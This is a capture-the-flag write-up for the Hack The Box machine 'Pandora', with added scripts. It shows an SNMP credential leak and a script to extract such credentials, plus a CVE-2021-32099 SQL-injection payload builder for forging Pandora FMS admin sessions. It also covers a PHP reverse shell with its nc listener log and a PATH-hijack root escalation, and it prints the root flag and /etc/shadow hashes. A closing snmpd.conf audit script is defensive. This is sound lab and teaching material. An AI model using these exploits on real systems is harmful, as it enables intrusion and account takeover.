htb-pandora-private

htb pandora
source: hackthebox.eu

Highlights

┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $sudo nmap -v --min-rate 10000 -sU pandora.htb -oN udp_nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-09 11:56 CEST
Initiating Ping Scan at 11:56
Scanning pandora.htb (10.10.11.136) [4 ports]
Completed Ping Scan at 11:56, 0.12s elapsed (1 total hosts)
Initiating UDP Scan at 11:56
Scanning pandora.htb (10.10.11.136) [1000 ports]
Discovered open port 161/udp on 10.10.11.136
Completed UDP Scan at 11:56, 0.70s elapsed (1000 total ports)
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.10s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
161/udp open snmp
2049/udp closed nfs
16503/udp closed unknown
19075/udp closed unknown
21655/udp closed unknown
54925/udp closed unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.94 seconds
Raw packets sent: 2028 (93.718KB) | Rcvd: 9 (772B)
Walking the SNMP tree with the default community string (the snmpd.conf at the end of this page has rocommunity public with no view restriction) returns hrSWRunParameters, 1.3.6.1.2.1.25.4.2.1.5, the argument list of every running process. Among the entries:

iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.837 = ""
iso.3.6.1.2.1.25.4.2.1.5.893 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.946 = ""
iso.3.6.1.2.1.25.4.2.1.5.948 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.951 = STRING: "--no-debug"
iso.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.3620 = ""
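Pulling the credential out of that output is a one-line filter, but the naive version also matches snmpd's own -p /run/snmpd.pid (a pid file) and getty's -p -- (no value at all). The script below is an added example, not part of the original writeup, with the relevant lines above embedded as a constructed sample; the snmpwalk command that produced them is not shown on the page and is assumed to be snmpwalk -v2c -c public pandora.htb 1.3.6.1.2.1.25.4.2.1.5.

```sh
#!/bin/sh
# Added example (not from the original writeup): extract "-u USER -p PASS" credentials from
# snmpwalk output of hrSWRunParameters (1.3.6.1.2.1.25.4.2.1.5), i.e. the argv of every process.
# Anything that knows the community string can read this, so a password passed as a command-line
# flag is effectively public. Assumed collection command (not on the page):
#   snmpwalk -v2c -c public pandora.htb 1.3.6.1.2.1.25.4.2.1.5

# Constructed sample: the relevant lines from the page, with the wrapped snmpd line joined.
SNMP_SAMPLE='iso.3.6.1.2.1.25.4.2.1.5.836 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.893 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.1101 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.3620 = ""'

# Reads snmpwalk output on stdin and prints "user password" for every hrSWRunParameters entry
# whose argv contains "-u USER ... -p PASS". A -p value starting with "/" or "-" is skipped:
# snmpd's "-p /run/snmpd.pid" is a pid file and getty's "-p --" carries no value, so both
# would otherwise show up as false positives.
extract_snmp_creds() {
    sed -n -E 's/^.*\.25\.4\.2\.1\.5\.[0-9]+ = STRING: ".*-u ([^ "]+) .*-p ([^ "/-][^ "]*).*"$/\1 \2/p'
}

# Usage: feed a live walk or a saved one, e.g.  snmpwalk ... | extract_snmp_creds
printf '%s\n' "$SNMP_SAMPLE" | extract_snmp_creds
```

The same argv is visible locally through ps to every user on the box, which is why the root crontab entry shown further down (host_check -u daniel -p HotelBabylon23) is a problem even without SNMP.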

Daniel's password was sitting in a process command line (the host_check cron job shown further down). It also works for SSH, and the login lets us forward the box's local web port, where the Pandora FMS console lives, to our machine:

┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $sudo ssh -L 80:localhost:80 daniel@pandora.htb
daniel@10.10.11.136's password:HotelBabylon23 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Mon 24 Jan 15:07:49 UTC 2022

System load: 0.37 Processes: 259
Usage of /: 63.6% of 4.87GB Users logged in: 1
Memory usage: 18% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%

=> /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Jan 24 15:06:04 2022 from 10.10.14.28
daniel@pandora:~$

With the tunnel up, the console is at http://127.0.0.1/pandora_console/. Its include/chart_generator.php puts the session_id parameter straight into a SQL query (CVE-2021-32099), and the row that comes back is decoded as PHP session data, so a UNION that supplies our own data column logs us in as whichever user we name. Browse to:

http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO

PoC: https://github.com/zjicmDarkWing/CVE-2021-32099

id_usuario|s:5:"admin"; is the serialized fragment that sets id_usuario to admin (5 is the byte length of the string; the -- comments out the rest of the original query). Then visit http://127.0.0.1/pandora_console/

and you are logged on as admin.
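The forged fragment has to be serialized exactly right or PHP's session decoder rejects it, which is the one part of this payload that breaks when people change the user name. The following is an added example, not the linked PoC and not Pandora FMS code; it assumes the console is reachable at http://127.0.0.1/pandora_console through the tunnel above and takes the column order of the UNION (1,2,data) from the URL above.

```sh
#!/bin/sh
# Added example (not the linked PoC): build the CVE-2021-32099 session-forgery payload for any user.
# chart_generator.php looks the supplied session_id up in the sessions table and hands the row's
# `data` column to PHP's session decoder, so a UNION that returns our own `data` sets
# $_SESSION['id_usuario']. Assumed base URL: the SSH tunnel from the writeup (127.0.0.1:80).

# PHP serialized session fragment: key|s:<byte length>:"value";
# The length is a byte count; a wrong value makes the decoder reject the whole string,
# which is why the page's payload reads s:5:"admin".
forged_session_data() {
    user=$1
    n=$(printf '%s' "$user" | LC_ALL=C wc -c | tr -d ' ')
    printf 'id_usuario|s:%s:"%s";' "$n" "$user"
}

# Raw SQL injected into session_id. The closing "-- -" comments out the remainder of the
# original query (MySQL needs whitespace after --).
sqli_payload() {
    printf "' union SELECT 1,2,'%s' as data -- -" "$(forged_session_data "$1")"
}

# Minimal URL encoding for the characters this payload contains (%, space, ', ").
urlencode_min() {
    sed -e 's/%/%25/g' -e 's/ /%20/g' -e "s/'/%27/g" -e 's/"/%22/g'
}

# Full URL to request. Loading it in the browser (or with curl -c cookies) leaves the session
# tied to the PHPSESSID cookie populated as the chosen user; the console then treats us as that user.
forge_url() {
    base=${2:-http://127.0.0.1/pandora_console}
    printf '%s/include/chart_generator.php?session_id=%s\n' "$base" "$(sqli_payload "$1" | urlencode_min)"
}

forge_url admin
```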

As admin, upload a PHP reverse shell through the console (the uploaded file is served from images/) and, with a listener waiting, request it:

http://127.0.0.1/pandora_console/images/shell.php
┌─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.70] from (UNKNOWN) [10.10.11.136] 57258
Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
07:20:43 up 2:02, 5 users, load average: 0.68, 0.63, 0.33
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
daniel pts/0 10.10.14.31 06:31 44:27 0.10s 0.00s ssh -L 80:127.0.0.1:80 daniel@pandora.htb
daniel pts/1 127.0.0.1 06:36 44:12 0.03s 0.03s -bash
daniel pts/2 10.10.14.31 06:39 41:41 0.03s 0.03s -bash
daniel pts/3 10.10.14.70 07:16 3:44 0.04s 0.04s -bash
daniel pts/4 10.10.14.55 07:10 11.00s 0.07s 0.07s -bash
uid=1000(matt) gid=1000(matt) groups=1000(matt)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
matt@pandora:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd

matt@pandora:/$ file /usr/bin/pandora_backup
/usr/bin/pandora_backup: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7174c3b04737ad11254839c20c8dab66fce55af8, for GNU/Linux 3.2.0, not stripped
matt@pandora:/$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar: /root/.backup/pandora-backup.tar.gz: Cannot open: Permission denied
tar: Error is not recoverable: exiting now
Backup failed!
Check your permissions!
matt@pandora:/$

The error is tar failing to open /root/.backup/pandora-backup.tar.gz. pandora_backup is SUID root, so the tar it launches should have had root privileges; it did not, which means the problem is the context our shell runs in, not the binary. It is not a restricted shell in the rbash sense either: commands run normally, the process tree just cannot pick up the privilege because it descends from the web server (on Ubuntu that points at a mandatory-access-control profile inherited from the service; cat /proc/$$/attr/current shows the label of the current shell, and reads unconfined for an ordinary login). The way out is a process that does not descend from the web server, for example a job started by atd, as listed for at on GTFOBins:

$ echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null

Alternatively, a fresh SSH login as matt (key-based here, with a key added to matt's authorized_keys from the shell above) is also a clean session in which the SUID binary behaves:

┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $ssh matt@pandora.htb -i id_rsa 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue 25 Jan 11:48:33 UTC 2022

System load: 0.27 Processes: 288
Usage of /: 63.4% of 4.87GB Users logged in: 1
Memory usage: 11% IPv4 address for eth0: 10.10.11.136
Swap usage: 0%

=> /boot is using 91.8% of 219MB


0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

matt@pandora:~$ ls
user.txt

The backup utility runs tar by bare name, so a directory we own placed first on PATH decides which tar runs. The first attempt below fails only because the planted script reads bin/bash: with no shebang the kernel refuses to exec it, the shell runs it as a script, and sh looks for bin/bash relative to the current directory. Correcting it to /bin/bash gives a root shell:

matt@pandora:~$ export PATH=/home/matt:$PATH
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
/home/matt/tar: 1: bin/bash: not found
Backup failed!
Check your permissions!
matt@pandora:~$ echo $PATH
/home/matt:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
matt@pandora:~$ cat tar
bin/bash
matt@pandora:~$ echo "/bin/bash" > tar
matt@pandora:~$ cat tar
/bin/bash
matt@pandora:~$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
root@pandora:~# cd /root
root@pandora:/root# ls
root.txt
root@pandora:/root# cat root.txt
e50cb013f81c9bb1880dd795ffbaead8
root@pandora:/root# cat /etc/shadow
root:$6$HM2preufywiCDqbY$XPrZFWf6w08MKkjghhCPBkxUo2Ag5xvZYOh4iD4XcN4zOVbWsdvqLYbznbUlLFxtC/.Z0oe9D6dT0cR7suhfr.:18794:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
--snip--
sshd:*:18789:0:99999:7:::
systemd-coredump:!!:18789::::::
matt:$6$JYpB9KogYA60PG6X$dU7jHpb3MIYYg0evztbE8Xw8dx7ok5/U0PaDT63FgQTwyJFr9DbaLa0WzeZGMFd05hrNCnoP5xTUr7Mkl2gNx1:18794:0:99999:7:::
lxd:!:18789::::::
Debian-snmp:!:18789:0:99999:7:::
mysql:!:18789:0:99999:7:::
daniel:$6$f4POti4xJyVf3/yD$7/efpNYDq.baYycVczUb4b5LlEBNami3//4TbI6lPNK2MaWPrqbdvAhLdMrfHnnZATY59rLgr4DeEZ3U8S41l/:18964:0:99999:7:::
root@pandora:/root#
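The whole escalation rests on pandora_backup resolving tar through PATH. The script below is an added example, not from the writeup, that reproduces that behaviour in a scratch directory with no SUID binary involved: a stand-in caller that names tar without a path, a hardened caller that pins the path and PATH, and the planted tar in both its broken (bin/bash) and working forms. The function names and the HIJACKED marker are my own.

```sh
#!/bin/sh
# Added example (not from the original writeup): sandboxed reproduction of the PATH hijack used
# against /usr/bin/pandora_backup. Nothing here is SUID; it shows how a program that runs `tar`
# by bare name executes whatever `tar` is first on PATH, and how a caller avoids that.

# Stand-in for the vulnerable caller: names tar without a path, resolved through PATH exactly
# as the backup binary's tar invocation was (the writeup's "/home/matt/tar: 1: bin/bash: not found"
# proves it executed the planted file).
vulnerable_caller() {
    sh -c 'tar --version 2>&1 | head -n 1'
}

# Hardened caller: absolute path to the tool and PATH pinned to trusted directories, so a writable
# directory earlier on the caller's PATH cannot substitute its own tar.
hardened_caller() {
    if [ -x /usr/bin/tar ]; then
        env -i PATH=/usr/bin:/bin /usr/bin/tar --version 2>&1 | head -n 1
    else
        echo "no /usr/bin/tar on this host"
    fi
}

# Plant a fake tar (script body $1) in a scratch directory, run caller $2 with that directory
# first on PATH, clean up. The PATH change is scoped to a subshell.
run_with_planted_tar() {
    body=$1
    dir=$(mktemp -d)
    printf '%s\n' "$body" > "$dir/tar"
    chmod 755 "$dir/tar"
    ( PATH="$dir:$PATH"; export PATH; "$2" )
    rm -rf "$dir"
}

# Working planted tar against the vulnerable caller: prints HIJACKED.
demo_hijack() {
    run_with_planted_tar "#!/bin/sh
echo HIJACKED" vulnerable_caller
}

# The writeup's first attempt: a body of "bin/bash" without a shebang. The kernel refuses to exec
# it, sh runs it as a script and fails to find bin/bash relative to the cwd. The exact wording of
# the error depends on which sh is installed, so only "not HIJACKED" is guaranteed.
demo_relative_path() {
    run_with_planted_tar "bin/bash" vulnerable_caller
}

# Same planted tar against the hardened caller: the real tar (or a clear message) runs instead.
demo_hardened() {
    run_with_planted_tar "#!/bin/sh
echo HIJACKED" hardened_caller
}

demo_hijack
demo_relative_path
demo_hardened
```

On the target the equivalent check before trying this is simply which tar (or command -v tar) after prepending a writable directory: if it resolves to your file, any privileged program that calls tar by bare name is exploitable in the same way.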
daniel@pandora:~$ ps aux | grep snmp
Debian-+ 856 0.0 0.3 22492 12712 ? Ss 09:23 0:01 /usr/sbin/snmpd -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
daniel 1708 0.0 0.0 8160 2416 pts/0 S+ 10:33 0:00 grep --color=auto snmp

daniel@pandora:~$ apt list snmpd -a
Listing... Done
snmpd/focal-updates,focal-security,now 5.8+dfsg-2ubuntu2.3 amd64 [installed]
snmpd/focal 5.8+dfsg-2ubuntu2 amd64

daniel@pandora:~$ apt list snmp -a
Listing... Done
snmp/focal-updates,focal-security,now 5.8+dfsg-2ubuntu2.3 amd64 [installed]
snmp/focal 5.8+dfsg-2ubuntu2 amd64

daniel@pandora:~$
root@pandora:/home/matt# crontab -l
# Edit this file to introduce tasks to be run by cron.
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h dom mon dow command
@reboot sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
root@pandora:/home/matt#
root@pandora:/home/matt# cd /etc/snmp
root@pandora:/etc/snmp# ls -la
total 16
drwxr-xr-x 2 root root 4096 Jun 16 2021 .
drwxr-xr-x 105 root root 4096 Jun 10 08:40 ..
-rw-r--r-- 1 root root 510 Jun 23 2020 snmp.conf
-rw------- 1 root root 2960 Jun 16 2021 snmpd.conf
root@pandora:/etc/snmp# 


root@pandora:/home/matt# cat /etc/snmp/snmp.conf 
# As the snmp packages come without MIB files due to license reasons, loading
# of MIBs is disabled by default. If you added the MIBs you can reenable
# loading them by commenting out the following line.
mibs :

# If you want to globally change where snmp libraries, commands and daemons
# look for MIBS, change the line below. Note you can set this for individual
# tools with the -M option or MIBDIRS environment variable.
#
# mibdirs /usr/share/snmp/mibs:/usr/share/snmp/mibs/iana:/usr/share/snmp/mibs/ietf

root@pandora:/home/matt# cat /etc/snmp/snmpd.conf 
###########################################################################
#
# snmpd.conf
# An example configuration file for configuring the Net-SNMP agent ('snmpd')
# See snmpd.conf(5) man page for details
#
###########################################################################
# SECTION: System Information Setup
#

# syslocation: The [typically physical] location of the system.
# Note that setting this value here means that when trying to
# perform an snmp SET operation to the sysLocation.0 variable will make
# the agent return the "notWritable" error code. IE, including
# this token in the snmpd.conf file will disable write access to
# the variable.
# arguments: location_string
sysLocation Mississippi
sysContact Daniel

# sysservices: The proper value for the sysServices object.
# arguments: sysservices_number
sysServices 72




###########################################################################
# SECTION: Agent Operating Mode
#
# This section defines how the agent will operate when it
# is running.

# master: Should the agent operate as a master agent or not.
# Currently, the only supported master agent type for this token
# is "agentx".
# 
# arguments: (on|yes|agentx|all|off|no)

master agentx

# agentaddress: The IP address and port number that the agent will listen on.
# By default the agent listens to any and all traffic from any
# interface on the default SNMP port (161). This allows you to
# specify which address, interface, transport type and port(s) that you
# want the agent to listen on. Multiple definitions of this token
# are concatenated together (using ':'s).
# arguments: [transport:]port[@interface/address],...

agentaddress udp:161,udp6:[::1]:161




###########################################################################
# SECTION: Access Control Setup
#
# This section defines who is allowed to talk to your running
# snmp agent.

# Views 
# arguments viewname included [oid]

# system + hrSystem groups only
view systemonly included .1.3.6.1.2.1.1
view systemonly included .1.3.6.1.2.1.25.1


# rocommunity: a SNMPv1/SNMPv2c read-only access community name
# arguments: community [default|hostname|network/bits] [oid | -V view]

# Read-only access to everyone to the systemonly view
rocommunity public
rocommunity6 public

# SNMPv3 doesn't use communities, but users with (optionally) an
# authentication and encryption string. This user needs to be created
# with what they can view with rouser/rwuser lines in this file.
#
# createUser username (MD5|SHA|SHA-512|SHA-384|SHA-256|SHA-224) authpassphrase [DES|AES] [privpassphrase]
# e.g.
# createuser authPrivUser SHA-512 myauthphrase AES myprivphrase
#
# This should be put into /var/lib/snmp/snmpd.conf 
#
# rouser: a SNMPv3 read-only access username
# arguments: username [noauth|auth|priv [OID | -V VIEW [CONTEXT]]]
rouser authPrivUser authpriv -V systemonly
root@pandora:/home/matt#
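Reading that config explains the leak. view systemonly is defined to cover only the system and hrSystem subtrees, but rocommunity public and rocommunity6 public are never bound to it (compare the rouser line, which does carry -V systemonly), so the public community reads the whole tree, hrSWRunParameters included. The script below is an added example, not the author's; it audits a constructed excerpt of the directives above and rewrites the offending lines the way the file's own syntax comment (community [default|hostname|network/bits] [oid | -V view]) requires. The view name systemonly is taken from the config; everything else is mine.

```sh
#!/bin/sh
# Added example (not from the original writeup): find snmpd.conf community directives that grant
# the full MIB tree and rewrite them to use the restrictive view the file already defines.

# Constructed excerpt of the relevant directives from the config shown above.
SNMPD_CONF='view systemonly included .1.3.6.1.2.1.1
view systemonly included .1.3.6.1.2.1.25.1
rocommunity public
rocommunity6 public
rouser authPrivUser authpriv -V systemonly'

# Prints every rocommunity/rocommunity6 line with no "-V <view>", i.e. every community that can
# read everything the agent exposes (hrSWRunParameters and the credentials in it included).
audit_snmp_communities() {
    grep -E '^[[:space:]]*rocommunity6?[[:space:]]' | grep -v -E '[[:space:]]-V[[:space:]]' || true
}

# Rewrites such lines to "rocommunity <name> default -V systemonly". The source keyword
# ("default" = any address) must precede the view, per the syntax comment in the file.
fix_snmp_communities() {
    sed -E '/^[[:space:]]*rocommunity6?[[:space:]]/{/[[:space:]]-V[[:space:]]/!s/[[:space:]]*$/ default -V systemonly/;}'
}

# Usage against a real file:  audit_snmp_communities < /etc/snmp/snmpd.conf
#                             fix_snmp_communities   < /etc/snmp/snmpd.conf > snmpd.conf.new
printf '%s\n' "$SNMPD_CONF" | audit_snmp_communities
printf '%s\n' "$SNMPD_CONF" | fix_snmp_communities
```

After installing the rewritten file and restarting snmpd, a walk of 1.3.6.1.2.1.25.4 with the public community should come back empty. Binding the view is only half of the fix: the community string itself should stop being public, and the rouser line shows the agent is already set up for SNMPv3 with authentication and encryption, which is where read access belongs.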
